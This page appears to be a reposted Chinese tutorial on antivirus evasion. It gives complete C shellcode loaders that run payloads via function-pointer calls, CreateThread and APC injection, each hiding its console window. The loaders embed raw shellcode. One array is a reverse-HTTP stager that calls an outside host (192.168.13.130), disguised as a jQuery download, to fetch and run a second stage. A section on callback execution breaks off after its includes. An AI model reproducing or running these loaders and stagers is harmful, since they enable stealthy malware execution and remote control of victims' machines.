欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 健康 > 养生 > 免杀0到1--ShellCode运行方式

免杀0到1--ShellCode运行方式

2025/1/24 7:08:00 来源:https://blog.csdn.net/qq_37107430/article/details/144812474  浏览:    关键词:免杀0到1--ShellCode运行方式

一.指针运行

#include <Windows.h>
#include <stdio.h>
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") // 不显示黑窗口unsigned char sc[] = "\x90\xe8\x2d\x05\x00\x00\x32\x0c\xc2\x57\x38\x3e\xed\xfa\x4e\x90\xc7\xf2\x04\x00\x80\x9a\x00\x45\x30\x2c\x0e\x45\x02\x2c\x0e\xe2\xf6\xab\x87\x6f\x8f\x8b\x8b\x43\x61\x3b\xbc\x59\xf7\xa6\x15\xab\x20\x55\x20\x19\xec\x63\x41\x66\x66\xc2\x8a\xbe\x36\x72\x08\x3c\xb0\xaa\x18\xa2\x60\xab\xd2\x19\xa0\xcf\x8f\x05\xfe\xbf\xbc\x2c\x5d\x62\x31\x5e\x5b\x9d\x3e\x3e\x47\x96\x3a\xbe\xee\xc7\x9f\x6d\x49\x1c\xa9\x96\x70\x96\xdd\x93\xf2\x34\x53\x57\x97\x04\x87\x40\xe1\xdf\x1c\x9b\x3e\xbd\x22\x8b\xd9\xd2\xe7\xeb\x0f\x17\x73\x52\xaf\x78\xeb\x09\x9a\xf6\x24\x41\x36\xd6\x5a\x85\xb2\x9b\x83\x0d\x11\x3f\xfd\x77\xa3\xc8\x32\x05\xbd\xab\x7a\xe7\x74\xbf\x0c\xb6\x17\x0b\x36\x2d\x51\xdb\x34\xee\x6c\x66\x56\xc9\x69\x58\x1b\x5c\x2f\x0e\x1f\x30\x05\xef\x1e\x8c\x99\xbd\x9f\xa1\x0e\xc7\xc5\x88\x64\x18\xda\xab\x6b\x8b\x37\xf9\x70\xad\x87\xb3\x76\x7e\xb0\x3e\x70\x9f\xbe\x15\x9d\x13\x2f\x7b\x9c\xde\x17\x97\x1c\xa6\xea\x08\x73\x1b\x75\xbd\x8c\xb4\x00\xd3\xc3\xda\x89\xdb\x88\x56\x56\xac\x42\x50\x64\x90\x6f\x6a\x87\xd7\xbe\x2c\x0a\xba\xe5\xe3\x01\xb0\x0e\xf1\xec\x99\x6d\xd6\xc1\xaf\x94\xf4\x5c\x60\x28\xdf\xe4\xa6\xed\x4e\xc3\x24\x04\x6c\x4c\x53\x85\x0f\x11\x80\x39\xd3\xf6\xbf\x89\xc1\x59\x21\xbf\x37\x92\xb8\x4a\x47\x3b\x2a\xdc\xa3\xad\x12\xf9\xc9\x78\xc7\xc0\x62\x06\x74\x0b\xd3\x8a\x8b\xed\x62\x34\xe4\x2b\x58\x46\xa8\x98\xfc\x18\xf4\xea\xb5\xb6\x07\xf6\xbd\x4e\x87\xe3\xd6\xad\x21\xf4\x90\xe3\x18\x35\x3c\x88\x3c\x70\x81\xb3\x02\xa0\xe0\x53\x86\x2c\x1e\xc0\xf3\x00\x7a\x31\x72\x9a\x35\x2d\x98\xed\x5d\xb5\xbc\xd9\xf3\xaa\x85\x75\xa3\xa6\xad\x2f\x06\x08\xac\x7a\x9c\x1b\xca\xf4\xd3\x69\xbb\xb8\xb9\x49\x89\xa9\xce\xf6\x4f\xa1\x60\x92\x27\x06\xf4\x1c\x57\xbb\x00\x13\x2e\x24\x14\xea\x49\x6e\x0a\xf2\x3f\x5f\x6c\x23\x10\xde\x84\xb4\x34\x20\xb3\x68\x75\xf3\x8c\x4e\x07\xc4\xfb\xbc\xdd\x18\xb5\xf7\x83\x86\x00\x3b\xff\xbc\xdf\xeb\x82\x83\xb8\x2d\xf0\x97\x4c\x56\xfb\x91\x9f\x72\x5b\xad\xd6\xd3\x01\xfa\x3f\x1f\xc6\x69\x02\x39\xca\xa7\x2f\x3a\x5a\x21\xa7\x63\x58\x99\xd3\x3d\x78\xea\xaa\xb5\x44\x57\x65\x20\xcd\xcd\x55\x51\x5f\x6a\x6b\x48\x85\x80\xea\xb5\x27\x00\x8d\x34\xec\xce\x03\x9d\xb5\xd9\x0b\x75\xd8\x33\xf7\xdc\xbd\x1d\x15\xec\x66\x16\x98\x54\xfb\x4f\x30\x41\xce\x37\xb4\x1f\xfe\x01\xba\x81\xe8\xed\x64\x0e\xec\xf9\x67\xf2\x9a\x8e\x64\x43\xc0\x37\x7c\x05\xd5\x91\xb9\xcf\xdb\x45\xca\x28\xf6\x35\x7f\xd1\xee\xac\xea\x3f\x70\x9f\x01\x73\xee\x51\x1b\x66\xe6\x15\xb9\x3e\x7b\x96\xf5\xd0\x2b\xe7\x68\xfc\x53\xaf\xc4\xf2\x88\xd8\xd6\xaf\xe4\xc4\x2e\xdb\xd9\xe3\xec\x78\x80\xa0\x89\x15\x93\x48\xc3\x7e\x82\xab\x59\xb0\x4b\x89\x15\xeb\xe0\x12\x49\x80\xf0\x57\x38\xd7\x66\x35\xba\x56\x8f\x8c\x01\xe5\xff\x53\x92\xd1\x19\x44\xa2\x3a\xf4\xa0\xb3\xad\x86\x67\x17\xb2\x49\x5c\xd4\xba\xa4\x85\xc7\x69\x3e\xab\x09\x4a\x31\x69\x26\x28\x5c\x32\xce\x08\xe1\x66\xdd\x8d\x47\xa0\x68\x9b\x1a\xdc\xee\x94\x1f\x73\x0c\x41\xd3\xc9\x25\xed\xe5\x02\x92\x9b\x84\x02\x0b\x73\x0f\x77\x98\x18\xdb\x0e\x98\xb8\x1b\xba\x4f\xa2\x1a\x90\x3b\x4d\x4d\xd7\xc3\x9d\x49\x1e\x4b\xaa\x01\xa4\x6b\xd1\x27\xaa\x25\x79\x5a\x4e\x42\x75\x2c\x2b\xa5\x04\x0e\xed\x01\xf7\x58\xb7\xdd\xc4\xdb\x07\x74\x6a\x63\x2d\x16\xb5\x19\x5d\xed\xc4\x20\x64\xd6\x5e\xd7\xa7\xa8\xf8\xae\x3b\xb3\x2b\xd5\xfb\x62\x3a\x69\x6f\x4b\x57\xd2\xe8\xe1\x30\x9b\xc8\x47\xf2\x46\x30\x7d\x51\x4f\xfb\x5e\xc7\x61\x3f\x18\xbc\x25\xc1\x72\xdd\xef\x64\x40\xce\xcb\x55\xc4\x31\x3c\xc5\xa2\x34\x1a\xd9\x8e\xba\x6f\x32\xcc\xbb\x72\x0b\xac\xd5\x57\x8e\x7c\xe2\x10\xd2\xe8\xad\xd0\x47\x91\x15\xff\x38\x99\x36\x06\x4f\x3f\x81\x8a\x97\xf3\x86\xee\x5e\x19\x85\x33\xb3\xd0\xf5\x12\x90\x3c\x5a\x29\xce\xa6\x70\xd8\x93\x62\x9c\x9e\x37\xda\x94\xcf\x76\x4b\xee\xc4\x70\x6d\x81\xd1\x0d\x6c\x6a\x8e\x71\xbe\x0c\x9e\xf2\xc3\xb0\x59\xce\x92\xcc\xc4\xb4\x48\xe3\x32\x1d\x26\x57\x46\xca\x68\x52\x25\x0c\x4b\xc2\xb5\x30\xa5\x34\xd9\x77\xae\xcf\xaa\x5f\x03\xc9\xd4\x42\xfe\x82\xd2\xd8\xfd\xd7\x2c\x50\x35\x0f\xb4\x13\xca\x4e\x7e\xaa\xc9\x2e\x89\x90\x54\xa7\xd3\x37\x45\x01\xd6\x22\xf1\x40\xf5\xba\x27\xdd\x7c\xcf\x54\x58\xf9\x21\x17\xe8\x4f\xe9\x1f\x83\xc7\x92\x8c\x1d\xe2\x5e\xb6\xc4\x98\xa0\x07\x80\xbd\x97\x82\x8a\x11\x04\x38\x2d\x8c\x11\x09\x05\xd9\xd1\x35\x66\x29\x19\xd2\x78\x0c\x41\x95\xc6\x4a\xbb\xa7\x6c\x58\x2f\xd6\x11\xc9\x3c\x2d\xb6\x65\x93\xc1\x81\xbe\xed\x1b\xb8\xc4\xa9\xc0\x3b\xc7\x0d\x04\x89\xf2\x46\xbb\xc7\xf5\x11\xd8\xc2\xbc\x6c\x7f\x6c\x6a\x17\xf6\x39\x2d\x20\xec\x2c\xd2\xbe\x3d\x97\xf1\xbd\xad\xb6\xfd\x2c\xe7\xd6\x2a\x0c\xa9\x1f\x23\xbd\x4f\x21\x2d\xb7\x9d\x79\x66\x7a\x1d\x86\x70\x69\x02\x4b\x3e\x91\x83\x0c\xce\x1b\xf9\x9c\xaf\x5f\xd2\x56\xc3\x14\x10\xda\xd4\x1e\x15\x92\x30\xe4\x8b\xc1\x1b\x8b\x6a\x25\xe5\x37\x5c\x20\xd5\x2c\x16\x6a\xdb\xbe\xfb\x2e\x91\x4c\xfd\x41\x3a\x2d\x07\x8b\x2b\x25\x5f\x88\x06\x28\xb2\x18\x70\x33\x50\xed\xa9\x1a\x0e\xec\xe1\x8e\xf4\xa9\x97\xce\x88\xde\xf2\x25\x86\x85\x8d\xff\xb5\x34\x86\x34\xec\xc8\x71\xb8\xfe\x80\x22\x4c\x5e\x64\x9d\xd2\xf2\xcd\xce\x83\x64\xf0\xb7\x78\x91\xac\xf9\xc2\x28\x56\xb0\x1f\xaf\x24\xd4\x3e\xeb\x43\x9b\x57\xfd\x56\xc1\xfe\x34\x37\xf2\x2f\x9d\xea\x68\x31\x0c\xd5\xdc\x36\xe2\xe7\x60\xf3\x3b\xa9\xcf\x1b\xd0\xd7\x08\x21\xba\xec\x88\x45\xf2\x7f\xd8\x50\x03\x27\x7b\xac\x1d\x47\xaa\x0d\x57\xc4\xf4\x8e\x27\x75\x6b\x91\x91\x50\xd0\xc0\x8c\xa8\x87\x13\x06\x32\xed\xa0\x5f\x3a\x35\x3b\xea\x7a\x8b\xb7\x3c\xd0\xe4\xaa\xd1\x3d\xb5\xf2\x2b\x27\xe3\xa1\x59\x16\x47\x23\x07\xfb\x52\xdf\x64\x3d\x7a\xf3\x47\x53\x5b\xb0\xf5\xb2\x80\xc1\xb8\xfc\xc0\x28\x10\x41\xa0\x76\xc7\xb0\x48\x8b\x3c\x24\x48\x83\xec\x08\x81\x2f\xf1\x56\x6d\x0f\xf7\x57\x04\x81\x77\x08\x4e\x90\x8b\x7f\xc1\x47\x0c\x49\xff\xe7";void main()
{LPVOID addr = VirtualAlloc(NULL, sizeof(sc), MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);if (addr == NULL) {return;}memcpy(addr, sc, sizeof(sc));((void(*)())addr)(); // addr强转成函数指针 , 加() , 调用函数 , 运行这块内存中的shellcode代码
}

解释:(void(*)()) 是一个函数指针类型的强制转换, 该函数指针指向一个没有参数且返回值类型为void的函数,也就是说这行代码将 addr 的地址转换为一个函数指针,然后调用该指针所指向的函数。

二.创建线程

#include <windows.h>
#include <stdio.h>
// 不显示黑窗口
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")
unsigned char sc[] = "\x90\xe8\x2d\x05\x00\x00\x32\x0c\xc2\x57\x38\x3e\xed\xfa\x4e\x90\xc7\xf2\x04\x00\x80\x9a\x00\x45\x30\x2c\x0e\x45\x02\x2c\x0e\xe2\xf6\xab\x87\x6f\x8f\x8b\x8b\x43\x61\x3b\xbc\x59\xf7\xa6\x15\xab\x20\x55\x20\x19\xec\x63\x41\x66\x66\xc2\x8a\xbe\x36\x72\x08\x3c\xb0\xaa\x18\xa2\x60\xab\xd2\x19\xa0\xcf\x8f\x05\xfe\xbf\xbc\x2c\x5d\x62\x31\x5e\x5b\x9d\x3e\x3e\x47\x96\x3a\xbe\xee\xc7\x9f\x6d\x49\x1c\xa9\x96\x70\x96\xdd\x93\xf2\x34\x53\x57\x97\x04\x87\x40\xe1\xdf\x1c\x9b\x3e\xbd\x22\x8b\xd9\xd2\xe7\xeb\x0f\x17\x73\x52\xaf\x78\xeb\x09\x9a\xf6\x24\x41\x36\xd6\x5a\x85\xb2\x9b\x83\x0d\x11\x3f\xfd\x77\xa3\xc8\x32\x05\xbd\xab\x7a\xe7\x74\xbf\x0c\xb6\x17\x0b\x36\x2d\x51\xdb\x34\xee\x6c\x66\x56\xc9\x69\x58\x1b\x5c\x2f\x0e\x1f\x30\x05\xef\x1e\x8c\x99\xbd\x9f\xa1\x0e\xc7\xc5\x88\x64\x18\xda\xab\x6b\x8b\x37\xf9\x70\xad\x87\xb3\x76\x7e\xb0\x3e\x70\x9f\xbe\x15\x9d\x13\x2f\x7b\x9c\xde\x17\x97\x1c\xa6\xea\x08\x73\x1b\x75\xbd\x8c\xb4\x00\xd3\xc3\xda\x89\xdb\x88\x56\x56\xac\x42\x50\x64\x90\x6f\x6a\x87\xd7\xbe\x2c\x0a\xba\xe5\xe3\x01\xb0\x0e\xf1\xec\x99\x6d\xd6\xc1\xaf\x94\xf4\x5c\x60\x28\xdf\xe4\xa6\xed\x4e\xc3\x24\x04\x6c\x4c\x53\x85\x0f\x11\x80\x39\xd3\xf6\xbf\x89\xc1\x59\x21\xbf\x37\x92\xb8\x4a\x47\x3b\x2a\xdc\xa3\xad\x12\xf9\xc9\x78\xc7\xc0\x62\x06\x74\x0b\xd3\x8a\x8b\xed\x62\x34\xe4\x2b\x58\x46\xa8\x98\xfc\x18\xf4\xea\xb5\xb6\x07\xf6\xbd\x4e\x87\xe3\xd6\xad\x21\xf4\x90\xe3\x18\x35\x3c\x88\x3c\x70\x81\xb3\x02\xa0\xe0\x53\x86\x2c\x1e\xc0\xf3\x00\x7a\x31\x72\x9a\x35\x2d\x98\xed\x5d\xb5\xbc\xd9\xf3\xaa\x85\x75\xa3\xa6\xad\x2f\x06\x08\xac\x7a\x9c\x1b\xca\xf4\xd3\x69\xbb\xb8\xb9\x49\x89\xa9\xce\xf6\x4f\xa1\x60\x92\x27\x06\xf4\x1c\x57\xbb\x00\x13\x2e\x24\x14\xea\x49\x6e\x0a\xf2\x3f\x5f\x6c\x23\x10\xde\x84\xb4\x34\x20\xb3\x68\x75\xf3\x8c\x4e\x07\xc4\xfb\xbc\xdd\x18\xb5\xf7\x83\x86\x00\x3b\xff\xbc\xdf\xeb\x82\x83\xb8\x2d\xf0\x97\x4c\x56\xfb\x91\x9f\x72\x5b\xad\xd6\xd3\x01\xfa\x3f\x1f\xc6\x69\x02\x39\xca\xa7\x2f\x3a\x5a\x21\xa7\x63\x58\x99\xd3\x3d\x78\xea\xaa\xb5\x44\x57\x65\x20\xcd\xcd\x55\x51\x5f\x6a\x6b\x48\x85\x80\xea\xb5\x27\x00\x8d\x34\xec\xce\x03\x9d\xb5\xd9\x0b\x75\xd8\x33\xf7\xdc\xbd\x1d\x15\xec\x66\x16\x98\x54\xfb\x4f\x30\x41\xce\x37\xb4\x1f\xfe\x01\xba\x81\xe8\xed\x64\x0e\xec\xf9\x67\xf2\x9a\x8e\x64\x43\xc0\x37\x7c\x05\xd5\x91\xb9\xcf\xdb\x45\xca\x28\xf6\x35\x7f\xd1\xee\xac\xea\x3f\x70\x9f\x01\x73\xee\x51\x1b\x66\xe6\x15\xb9\x3e\x7b\x96\xf5\xd0\x2b\xe7\x68\xfc\x53\xaf\xc4\xf2\x88\xd8\xd6\xaf\xe4\xc4\x2e\xdb\xd9\xe3\xec\x78\x80\xa0\x89\x15\x93\x48\xc3\x7e\x82\xab\x59\xb0\x4b\x89\x15\xeb\xe0\x12\x49\x80\xf0\x57\x38\xd7\x66\x35\xba\x56\x8f\x8c\x01\xe5\xff\x53\x92\xd1\x19\x44\xa2\x3a\xf4\xa0\xb3\xad\x86\x67\x17\xb2\x49\x5c\xd4\xba\xa4\x85\xc7\x69\x3e\xab\x09\x4a\x31\x69\x26\x28\x5c\x32\xce\x08\xe1\x66\xdd\x8d\x47\xa0\x68\x9b\x1a\xdc\xee\x94\x1f\x73\x0c\x41\xd3\xc9\x25\xed\xe5\x02\x92\x9b\x84\x02\x0b\x73\x0f\x77\x98\x18\xdb\x0e\x98\xb8\x1b\xba\x4f\xa2\x1a\x90\x3b\x4d\x4d\xd7\xc3\x9d\x49\x1e\x4b\xaa\x01\xa4\x6b\xd1\x27\xaa\x25\x79\x5a\x4e\x42\x75\x2c\x2b\xa5\x04\x0e\xed\x01\xf7\x58\xb7\xdd\xc4\xdb\x07\x74\x6a\x63\x2d\x16\xb5\x19\x5d\xed\xc4\x20\x64\xd6\x5e\xd7\xa7\xa8\xf8\xae\x3b\xb3\x2b\xd5\xfb\x62\x3a\x69\x6f\x4b\x57\xd2\xe8\xe1\x30\x9b\xc8\x47\xf2\x46\x30\x7d\x51\x4f\xfb\x5e\xc7\x61\x3f\x18\xbc\x25\xc1\x72\xdd\xef\x64\x40\xce\xcb\x55\xc4\x31\x3c\xc5\xa2\x34\x1a\xd9\x8e\xba\x6f\x32\xcc\xbb\x72\x0b\xac\xd5\x57\x8e\x7c\xe2\x10\xd2\xe8\xad\xd0\x47\x91\x15\xff\x38\x99\x36\x06\x4f\x3f\x81\x8a\x97\xf3\x86\xee\x5e\x19\x85\x33\xb3\xd0\xf5\x12\x90\x3c\x5a\x29\xce\xa6\x70\xd8\x93\x62\x9c\x9e\x37\xda\x94\xcf\x76\x4b\xee\xc4\x70\x6d\x81\xd1\x0d\x6c\x6a\x8e\x71\xbe\x0c\x9e\xf2\xc3\xb0\x59\xce\x92\xcc\xc4\xb4\x48\xe3\x32\x1d\x26\x57\x46\xca\x68\x52\x25\x0c\x4b\xc2\xb5\x30\xa5\x34\xd9\x77\xae\xcf\xaa\x5f\x03\xc9\xd4\x42\xfe\x82\xd2\xd8\xfd\xd7\x2c\x50\x35\x0f\xb4\x13\xca\x4e\x7e\xaa\xc9\x2e\x89\x90\x54\xa7\xd3\x37\x45\x01\xd6\x22\xf1\x40\xf5\xba\x27\xdd\x7c\xcf\x54\x58\xf9\x21\x17\xe8\x4f\xe9\x1f\x83\xc7\x92\x8c\x1d\xe2\x5e\xb6\xc4\x98\xa0\x07\x80\xbd\x97\x82\x8a\x11\x04\x38\x2d\x8c\x11\x09\x05\xd9\xd1\x35\x66\x29\x19\xd2\x78\x0c\x41\x95\xc6\x4a\xbb\xa7\x6c\x58\x2f\xd6\x11\xc9\x3c\x2d\xb6\x65\x93\xc1\x81\xbe\xed\x1b\xb8\xc4\xa9\xc0\x3b\xc7\x0d\x04\x89\xf2\x46\xbb\xc7\xf5\x11\xd8\xc2\xbc\x6c\x7f\x6c\x6a\x17\xf6\x39\x2d\x20\xec\x2c\xd2\xbe\x3d\x97\xf1\xbd\xad\xb6\xfd\x2c\xe7\xd6\x2a\x0c\xa9\x1f\x23\xbd\x4f\x21\x2d\xb7\x9d\x79\x66\x7a\x1d\x86\x70\x69\x02\x4b\x3e\x91\x83\x0c\xce\x1b\xf9\x9c\xaf\x5f\xd2\x56\xc3\x14\x10\xda\xd4\x1e\x15\x92\x30\xe4\x8b\xc1\x1b\x8b\x6a\x25\xe5\x37\x5c\x20\xd5\x2c\x16\x6a\xdb\xbe\xfb\x2e\x91\x4c\xfd\x41\x3a\x2d\x07\x8b\x2b\x25\x5f\x88\x06\x28\xb2\x18\x70\x33\x50\xed\xa9\x1a\x0e\xec\xe1\x8e\xf4\xa9\x97\xce\x88\xde\xf2\x25\x86\x85\x8d\xff\xb5\x34\x86\x34\xec\xc8\x71\xb8\xfe\x80\x22\x4c\x5e\x64\x9d\xd2\xf2\xcd\xce\x83\x64\xf0\xb7\x78\x91\xac\xf9\xc2\x28\x56\xb0\x1f\xaf\x24\xd4\x3e\xeb\x43\x9b\x57\xfd\x56\xc1\xfe\x34\x37\xf2\x2f\x9d\xea\x68\x31\x0c\xd5\xdc\x36\xe2\xe7\x60\xf3\x3b\xa9\xcf\x1b\xd0\xd7\x08\x21\xba\xec\x88\x45\xf2\x7f\xd8\x50\x03\x27\x7b\xac\x1d\x47\xaa\x0d\x57\xc4\xf4\x8e\x27\x75\x6b\x91\x91\x50\xd0\xc0\x8c\xa8\x87\x13\x06\x32\xed\xa0\x5f\x3a\x35\x3b\xea\x7a\x8b\xb7\x3c\xd0\xe4\xaa\xd1\x3d\xb5\xf2\x2b\x27\xe3\xa1\x59\x16\x47\x23\x07\xfb\x52\xdf\x64\x3d\x7a\xf3\x47\x53\x5b\xb0\xf5\xb2\x80\xc1\xb8\xfc\xc0\x28\x10\x41\xa0\x76\xc7\xb0\x48\x8b\x3c\x24\x48\x83\xec\x08\x81\x2f\xf1\x56\x6d\x0f\xf7\x57\x04\x81\x77\x08\x4e\x90\x8b\x7f\xc1\x47\x0c\x49\xff\xe7";
void main() {// 使用VirtualAlloc 函数申请一个 shellcode字节大小的可以执行代码的内存块LPVOID addr = VirtualAlloc(NULL, sizeof(sc), MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);// 把shellcode拷贝到这块内存memcpy(addr, sc, sizeof(sc));// 创建线程运行HANDLE hThread = CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE)addr,NULL,NULL,0);// 等待线程运行WaitForSingleObject(hThread, -1);// 关闭线程CloseHandle(hThread);
}

三.APC注入

介绍

异步过程调用(APC)队列是一个与线程关联的队列,用于存储要在该线程上下文中异步执行的函数。操作系统内核会跟踪每个线程的 APC 队列,并在适当的时机触发队列中挂起的函数。APC 队列通常用于实现线程间的异步通信、定时器回调以及异步 I/O 操作。

APC 队列包含两种类型的 APC

  1. 内核模式 APC:由内核代码发起,通常用于处理内核级别的异步操作,如异步 I/O 完成。
  2. 用户模式 APC:由用户代码发起,允许用户态应用程序将特定函数插入到线程的 APC 队列中,以便在线程上下文中异步执行

思路分析

  • 使用 VirtualProtect 函数修改 shellcode 所在内存区域的保护属性,将其设置为可执行、可读、可写( PAGE_EXECUTE_READWRITE ),以便执行其中的代码。
  • 获取 NtTestAlert 函数的地址。这是一个内部函数,无法直接通过函数名调用。 NtTestAlert 函数用于检查当前线程的 APC 队列。如果队列中有挂起的用户模式 APC 请求, NtTestAlert 将触发它们的执行。
  • 使用 QueueUserAPC 函数向当前线程的 APC 队列添加一个执行 Shellcode 的任务。这将在NtTestAlert 被调用时执行 Shellcode。
  • 调用 NtTestAlert 函数,触发 APC 队列中的任务执行,实现 Shellcode 的执行。
#include <windows.h>
#include <stdio.h>
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") // 不显示黑窗口unsigned char sc[] = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x50\x00\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x6a\x71\x75\x65\x72\x79\x2d\x33\x2e\x33\x2e\x32\x2e\x73\x6c\x69\x6d\x2e\x6d\x69\x6e\x2e\x6a\x73\x00\x17\x83\x47\x19\x26\xd4\x3b\x55\x5a\x7f\x2f\x8a\x88\xf6\xb1\x6c\x22\x27\xf8\xf9\x0c\x22\x1f\x59\xae\x17\x6b\xcb\xca\xf8\x66\x6f\xdd\xbb\xeb\x98\x68\xa1\xc7\x35\x29\x88\xd6\xee\xa5\xb9\x5b\x80\x7f\xec\xf4\x1b\xd7\x00\x41\x63\x63\x65\x70\x74\x3a\x20\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x2c\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x68\x74\x6d\x6c\x2b\x78\x6d\x6c\x2c\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x6d\x6c\x3b\x71\x3d\x30\x2e\x39\x2c\x2a\x2f\x2a\x3b\x71\x3d\x30\x2e\x38\x0d\x0a\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x3a\x20\x65\x6e\x2d\x55\x53\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x35\x0d\x0a\x52\x65\x66\x65\x72\x65\x72\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x63\x6f\x64\x65\x2e\x6a\x71\x75\x65\x72\x79\x2e\x63\x6f\x6d\x2f\x0d\x0a\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x20\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x0d\x0a\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x33\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x37\x2e\x30\x3b\x20\x72\x76\x3a\x31\x31\x2e\x30\x29\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x0d\x0a\x00\xd0\xdb\x73\xdc\x21\x32\x0b\x41\x4e\x68\x98\xc1\xdf\x00\xeb\x83\xa4\x7d\x01\x3e\x15\xe3\x61\x1d\xd1\x02\xa6\x2c\x38\xa7\x58\x70\x0d\x1c\x2a\x6d\x4a\x30\x41\x39\x28\x6a\x41\xeb\x44\xa7\x49\xbe\x52\x97\xe8\x11\x2f\x7f\xc0\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\xaf\x0f\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x33\x2e\x31\x33\x30\x00\x00\x01\x86\xa0";
typedef DWORD(WINAPI* pNtTestAlert)();void main() {// 修改 shellcode 所在内存区域的保护属性,允许执行DWORD oldProtect;VirtualProtect((LPVOID)sc, sizeof(sc), PAGE_EXECUTE_READWRITE, &oldProtect);/*获取NtTestAlert函数地址, 因为它是一个内部函数.无法直接通过函数名调用这个函数用于检查当前线程的 APC(Asynchronous Procedure Call,异步过程调用)队列,如果队列中有挂起的用户模式 APC 请求,NtTestAlert 将触发它们的执行*/pNtTestAlert NtTestAlert = (pNtTestAlert)(GetProcAddress(GetModuleHandleA("ntdll"),"NtTestAlert"));// 向当前线程的异步过程调用(APC)队列添加一个执行shellcode的任务QueueUserAPC((PAPCFUNC)(PTHREAD_START_ROUTINE)(LPVOID)sc, GetCurrentThread(),NULL);//调用NtTestAlert,触发 APC 队列中的任务执行(即执行 shellcode)NtTestAlert();
}

四.回调函数

函数原型:EnumDateFormatsA​

参数说明:

BOOL EnumDateFormatsA(
[in] DATEFMT\_ENUMPROCA lpDateFmtEnumProc, // 指向应用程序定义的回调函数的指针
[in] LCID Locale, // 用于指定要为其检索日期格式信息的区域设置的区域设置标识符
[in] DWORD dwFlags // 指定日期格式的标志
);

PS:所有回调函数用法基本一致,除了VirtualAlloc,也可以尝试修改内存属性,定义数据段等(方法通用)

EnumDateFormatsA函数:

#include <Windows.h>
#include <stdio.h>
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") // 不显示黑窗口
